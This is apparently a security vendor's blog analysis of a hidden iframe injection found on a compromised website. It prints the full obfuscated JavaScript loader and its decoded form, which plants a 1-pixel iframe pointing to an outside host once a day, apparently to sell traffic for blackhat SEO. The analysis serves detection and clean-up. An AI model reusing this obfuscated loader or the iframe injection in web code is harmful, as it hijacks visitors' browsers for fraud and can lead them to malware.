Hidden iframes serving blackhat SEO business

Hidden iframes still popular blackhat SEO technique to drive "unique visitors"

Another victim of malicious hidden iframe injection was detected today with Online Website Malware Scanner. The compromised company's website not only offers IT security services but it shared its traffic with website related to completely another industry(Thailand website with pharma products).

This particular case, as other similar attacks, is likely to be a part of paid "iframe-traffic shop" blackhat SEO services. Customer buys visitors to his website to improve search engine ranking. The .php file linked in the iframe appears doing nothing and contained "OK" string only (at the time this article was written). The name clk.php is obviously a click-counter method to build the reports and present the "customers". Decoded payload injects the hidden iframe once in 24 hours period to generate "unique visitors" traffic. 

Malicious action

Malicious iframes are often used to distribute malware hosted on external web resources(websites).

Website malware scanner report

Submission date: Mon Apr 29 06:44:07 2013

Infected website's files: 10

Website malware scan report link: http://goo.gl/bJLgU

Quttera | Online Website Malware Scanner

Malicious JavaScript detection dump

Malware entry

Malware entry details.

Beautified script

1. ss = eval("Str" + "ing");
2. d = document;
3. a ="68,77,70,65,76,6b,71,70,22,7c,7c,7c,68,68,68,2a,2b,22,7d,f,c,22,22,22,22,78,63,74,22,69,79,74,67,22,3f,22,66,71,65,77,6f,67,70,76,30,65,74,67,63,76,67,47,6e,67,6f,67,70,76,2a,29,6b,68,74,63,6f,67,29,2b,3d,f,c,f,c,22,22,22,22,69,79,74,67,30,75,74,65,22,3f,22,29,6a,76,76,72,3c,31,31,68,71,74,6f,71,74,67,6e,6b,68,67,30,70,67,76,31,6b,70,78,67,70,76,31,65,6e,6d,30,72,6a,72,29,3d,f,c,22,22,22,22,69,79,74,67,30,75,76,7b,6e,67,30,72,71,75,6b,76,6b,71,70,22,3f,22,29,63,64,75,71,6e,77,76,67,29,3d,f,c,22,22,22,22,69,79,74,67,30,75,76,7b,6e,67,30,64,71,74,66,67,74,22,3f,22,29,32,29,3d,f,c,22,22,22,22,69,79,74,67,30,75,76,7b,6e,67,30,6a,67,6b,69,6a,76,22,3f,22,29,33,72,7a,29,3d,f,c,22,22,22,22,69,79,74,67,30,75,76,7b,6e,67,30,79,6b,66,76,6a,22,3f,22,29,33,72,7a,29,3d,f,c,22,22,22,22,69,79,74,67,30,75,76,7b,6e,67,30,6e,67,68,76,22,3f,22,29,33,72,7a,29,3d,f,c,22,22,22,22,69,79,74,67,30,75,76,7b,6e,67,30,76,71,72,22,3f,22,29,33,72,7a,29,3d,f,c,f,c,22,22,22,22,6b,68,22,2a,23,66,71,65,77,6f,67,70,76,30,69,67,76,47,6e,67,6f,67,70,76,44,7b,4b,66,2a,29,69,79,74,67,29,2b,2b,22,7d,f,c,22,22,22,22,22,22,22,22,66,71,65,77,6f,67,70,76,30,79,74,6b,76,67,2a,29,3e,66,6b,78,22,6b,66,3f,5e,29,69,79,74,67,5e,29,40,3e,31,66,6b,78,40,29,2b,3d,f,c,22,22,22,22,22,22,22,22,66,71,65,77,6f,67,70,76,30,69,67,76,47,6e,67,6f,67,70,76,44,7b,4b,66,2a,29,69,79,74,67,29,2b,30,63,72,72,67,70,66,45,6a,6b,6e,66,2a,69,79,74,67,2b,3d,f,c,22,22,22,22,7f,f,c,7f,f,c,68,77,70,65,76,6b,71,70,22,55,67,76,45,71,71,6d,6b,67,2a,65,71,71,6d,6b,67,50,63,6f,67,2e,65,71,71,6d,6b,67,58,63,6e,77,67,2e,70,46,63,7b,75,2e,72,63,76,6a,2b,22,7d,f,c,22,78,63,74,22,76,71,66,63,7b,22,3f,22,70,67,79,22,46,63,76,67,2a,2b,3d,f,c,22,78,63,74,22,67,7a,72,6b,74,67,22,3f,22,70,67,79,22,46,63,76,67,2a,2b,3d,f,c,22,6b,68,22,2a,70,46,63,7b,75,3f,3f,70,77,6e,6e,22,7e,7e,22,70,46,63,7b,75,3f,3f,32,2b,22,70,46,63,7b,75,3f,33,3d,f,c,22,67,7a,72,6b,74,67,30,75,67,76,56,6b,6f,67,2a,76,71,66,63,7b,30,69,67,76,56,6b,6f,67,2a,2b,22,2d,22,35,38,32,32,32,32,32,2c,34,36,2c,70,46,63,7b,75,2b,3d,f,c,22,66,71,65,77,6f,67,70,76,30,65,71,71,6d,6b,67,22,3f,22,65,71,71,6d,6b,67,50,63,6f,67,2d,24,3f,24,2d,67,75,65,63,72,67,2a,65,71,71,6d,6b,67,58,63,6e,77,67,2b,f,c,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,2d,22,24,3d,67,7a,72,6b,74,67,75,3f,24,22,2d,22,67,7a,72,6b,74,67,30,76,71,49,4f,56,55,76,74,6b,70,69,2a,2b,22,2d,22,2a,2a,72,63,76,6a,2b,22,41,22,24,3d,22,72,63,76,6a,3f,24,22,2d,22,72,63,76,6a,22,3c,22,24,24,2b,3d,f,c,7f,f,c,68,77,70,65,76,6b,71,70,22,49,67,76,45,71,71,6d,6b,67,2a,22,70,63,6f,67,22,2b,22,7d,f,c,22,78,63,74,22,75,76,63,74,76,22,3f,22,66,71,65,77,6f,67,70,76,30,65,71,71,6d,6b,67,30,6b,70,66,67,7a,51,68,2a,22,70,63,6f,67,22,2d,22,24,3f,24,22,2b,3d,f,c,22,78,63,74,22,6e,67,70,22,3f,22,75,76,63,74,76,22,2d,22,70,63,6f,67,30,6e,67,70,69,76,6a,22,2d,22,33,3d,f,c,22,6b,68,22,2a,22,2a,22,23,75,76,63,74,76,22,2b,22,28,28,f,c,22,2a,22,70,63,6f,67,22,23,3f,22,66,71,65,77,6f,67,70,76,30,65,71,71,6d,6b,67,30,75,77,64,75,76,74,6b,70,69,2a,22,32,2e,22,70,63,6f,67,30,6e,67,70,69,76,6a,22,2b,22,2b,22,2b,f,c,22,7d,f,c,22,74,67,76,77,74,70,22,70,77,6e,6e,3d,f,c,22,7f,f,c,22,6b,68,22,2a,22,75,76,63,74,76,22,3f,3f,22,2f,33,22,2b,22,74,67,76,77,74,70,22,70,77,6e,6e,3d,f,c,22,78,63,74,22,67,70,66,22,3f,22,66,71,65,77,6f,67,70,76,30,65,71,71,6d,6b,67,30,6b,70,66,67,7a,51,68,2a,22,24,3d,24,2e,22,6e,67,70,22,2b,3d,f,c,22,6b,68,22,2a,22,67,70,66,22,3f,3f,22,2f,33,22,2b,22,67,70,66,22,3f,22,66,71,65,77,6f,67,70,76,30,65,71,71,6d,6b,67,30,6e,67,70,69,76,6a,3d,f,c,22,74,67,76,77,74,70,22,77,70,67,75,65,63,72,67,2a,22,66,71,65,77,6f,67,70,76,30,65,71,71,6d,6b,67,30,75,77,64,75,76,74,6b,70,69,2a,22,6e,67,70,2e,22,67,70,66,22,2b,22,2b,3d,f,c,7f,f,c,6b,68,22,2a,70,63,78,6b,69,63,76,71,74,30,65,71,71,6d,6b,67,47,70,63,64,6e,67,66,2b,f,c,7d,f,c,6b,68,2a,49,67,76,45,71,71,6d,6b,67,2a,29,78,6b,75,6b,76,67,66,61,77,73,29,2b,3f,3f,37,37,2b,7d,7f,67,6e,75,67,7d,55,67,76,45,71,71,6d,6b,67,2a,29,78,6b,75,6b,76,67,66,61,77,73,29,2e,22,29,37,37,29,2e,22,29,33,29,2e,22,29,31,29,2b,3d,f,c,f,c,7c,7c,7c,68,68,68,2a,2b,3d,f,c,7f,f,c,7f".split(",");
4. for (i = 0; i < a.length; i++) {
5.     a[i] = parseInt(a[i], 16) - (5 - 3);
6. }
7. try {
8.     d.body--
9. } catch (q) {
10.     zz = 0;
11. }
12. try {
13.     zz &= 2
14. } catch (q) {
15.     zz = 1;
16. }
17. if (!zz) if (window.document) eval(ss.fromCharCode.apply(ss, a));

Malicious payload

Decoded payload generates hidden iframe to http://formorelife.net/invent/clk.php

1. function zzzfff() {
2.     var gwre = document.createElement('iframe');
3.     gwre.src = 'http://formorelife.net/invent/clk.php';
4.     gwre.style.position = 'absolute';
5.     gwre.style.border = '0';
6.     gwre.style.height = '1px';
7.     gwre.style.width = '1px';
8.     gwre.style.left = '1px';
9.     gwre.style.top = '1px';
10.     if (!document.getElementById('gwre')) {
11.         document.write('<div id=\'gwre\'></div>');
12.         document.getElementById('gwre').appendChild(gwre);
13.     }
14. }

Here the cookies are used to inject the iframe once in 24 hours period.

1. function SetCookie(cookieName, cookieValue, nDays, path) {
2.     var today = new Date();
3.     var expire = new Date();
4.     if (nDays == null || nDays == 0) nDays = 1;
5.     expire.setTime(today.getTime() + 3600000 * 24 * nDays);
6.     document.cookie = cookieName + "=" + escape(cookieValue)
7.     + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
8. }
10. function GetCookie(name) {
11.     var start = document.cookie.indexOf(name + "=");
12.     var len = start + name.length + 1;
13.     if ((!start) &&
14.     (name != document.cookie.substring(0, name.length)))
15.     {
16.         return null;
17.     }
19.     if (start == -1) return null;
20.     var end = document.cookie.indexOf(";", len);
21.     if (end == -1) end = document.cookie.length;
22.     return unescape(document.cookie.substring(len, end));
23. }
25. if (navigator.cookieEnabled)
26. {
27.     if (GetCookie('visited_uq') == 55) {} else {
28.         SetCookie('visited_uq', '55', '1', '/');
29.         zzzfff();
30.     }
31. }

Malware clean-up

Such malware is often hidden inside the JavaScript file. If you suspect that your website was infected by similar malware please use Website Anti-malware Monitoring for remediation assessment.